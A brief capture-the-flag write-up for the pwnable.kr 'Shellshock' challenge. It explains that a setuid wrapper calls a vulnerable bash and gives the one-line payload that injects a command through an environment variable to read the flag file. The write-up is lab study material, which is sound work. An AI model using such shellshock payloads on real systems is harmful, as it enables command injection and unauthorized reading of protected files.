Pwnable.kr Shellshock

Last updated Aug 20, 2022 Edit Source

• Cs security

This challenge has a bash executable in the home directory which the shellshock executable runs like below:

1

system("/home/shellshock/bash -c 'echo shock_me'");

The bash binary is vulnerable to shellshock as can be seen by the following command:

1

env x='() { :;}; echo vulnerable' ./bash -c 'echo hello'

Since the binary simply calls the bash binary, we can the command below to run the flag:

1

env x='() { :;}; /bin/cat flag' ./shellshock